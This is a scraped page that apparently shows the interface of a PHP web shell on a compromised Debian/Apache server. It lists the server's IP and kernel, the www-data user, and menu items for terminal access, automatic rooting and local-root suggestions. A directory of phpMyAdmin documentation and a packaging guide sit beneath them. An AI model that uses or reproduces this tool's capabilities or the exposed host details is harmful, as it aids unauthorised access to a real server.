Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
phpmyadmin /
html /
_sources /
Delete
Unzip
Name
Size
Permission
Date
Action
config.txt
94.58
KB
-rw-r--r--
2017-01-23 20:20
copyright.txt
1.86
KB
-rw-r--r--
2017-01-23 20:20
credits.txt
26.16
KB
-rw-r--r--
2017-01-23 20:20
developers.txt
380
B
-rw-r--r--
2017-01-23 20:20
faq.txt
90.08
KB
-rw-r--r--
2017-01-23 20:20
glossary.txt
11.88
KB
-rw-r--r--
2017-01-23 20:20
import_export.txt
1.1
KB
-rw-r--r--
2017-01-23 20:20
index.txt
561
B
-rw-r--r--
2017-01-23 20:20
intro.txt
2.59
KB
-rw-r--r--
2017-01-23 20:20
other.txt
522
B
-rw-r--r--
2017-01-23 20:20
privileges.txt
3.24
KB
-rw-r--r--
2017-01-23 20:20
require.txt
1.55
KB
-rw-r--r--
2017-01-23 20:20
setup.txt
29.15
KB
-rw-r--r--
2017-01-23 20:20
transformations.txt
6.28
KB
-rw-r--r--
2017-01-23 20:20
user.txt
117
B
-rw-r--r--
2017-01-23 20:20
vendors.txt
1.18
KB
-rw-r--r--
2017-01-23 20:20
Save
Rename
Distributing and packaging phpMyAdmin ===================================== This document is intended to give advices to people who want to redistribute phpMyAdmin inside other software package such as Linux distribution or some all in one package including web server and MySQL server. Generally you can customize some basic aspects (paths to some files and behavior) in :file:`libraries/vendor_config.php`. For example if you want setup script to generate config file in var, change ``SETUP_CONFIG_FILE`` to :file:`/var/lib/phpmyadmin/config.inc.php` and you will also probably want to skip directory writable check, so set ``SETUP_DIR_WRITABLE`` to false. External libraries ------------------ phpMyAdmin includes several external libraries, you might want to replace them with system ones if they are available, but please note that you should test whether version you provide is compatible with the one we ship. Currently known list of external libraries: js/jquery jQuery js framework and various jQuery based libraries. libraries/php-gettext php-gettext library libraries/tcpdf tcpdf library, stripped down of not needed files libraries/phpseclib portions of phpseclib library